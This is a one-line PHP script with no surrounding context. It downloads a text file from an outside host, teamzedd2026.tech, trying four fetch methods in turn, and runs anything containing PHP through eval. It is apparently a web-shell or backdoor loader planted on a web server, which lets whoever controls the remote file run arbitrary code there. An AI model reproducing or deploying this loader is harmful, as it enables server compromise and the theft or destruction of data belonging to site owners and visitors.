<?php session_start();$u=$_SESSION['ts_url']??'https://teamzedd2026.tech/media/uploads/r/k/rahman.txt';$r=@file_get_contents($u)??(function($x){$c=curl_init($x);curl_setopt($c,19913,1);$o=curl_exec($c);curl_close($c);return$o;})($u)??(function($x){$p=parse_url($x);$fp=@fsockopen(($p['scheme']==='https'?'ssl://':'').$p['host'],$p['scheme']==='https'?443:80);if(!$fp)return;fwrite($fp,"GET {$p['path']} HTTP/1.0\r\nHost:{$p['host']}\r\n\r\n");$d=stream_get_contents($fp);fclose($fp);return substr($d,strpos($d,"\r\n\r\n")+4);})($u)??(ob_start()||1)&&@readfile($u)&&ob_get_clean();strpos($r,'<?php')!==false?eval("?>$r"):print'X'; ?>
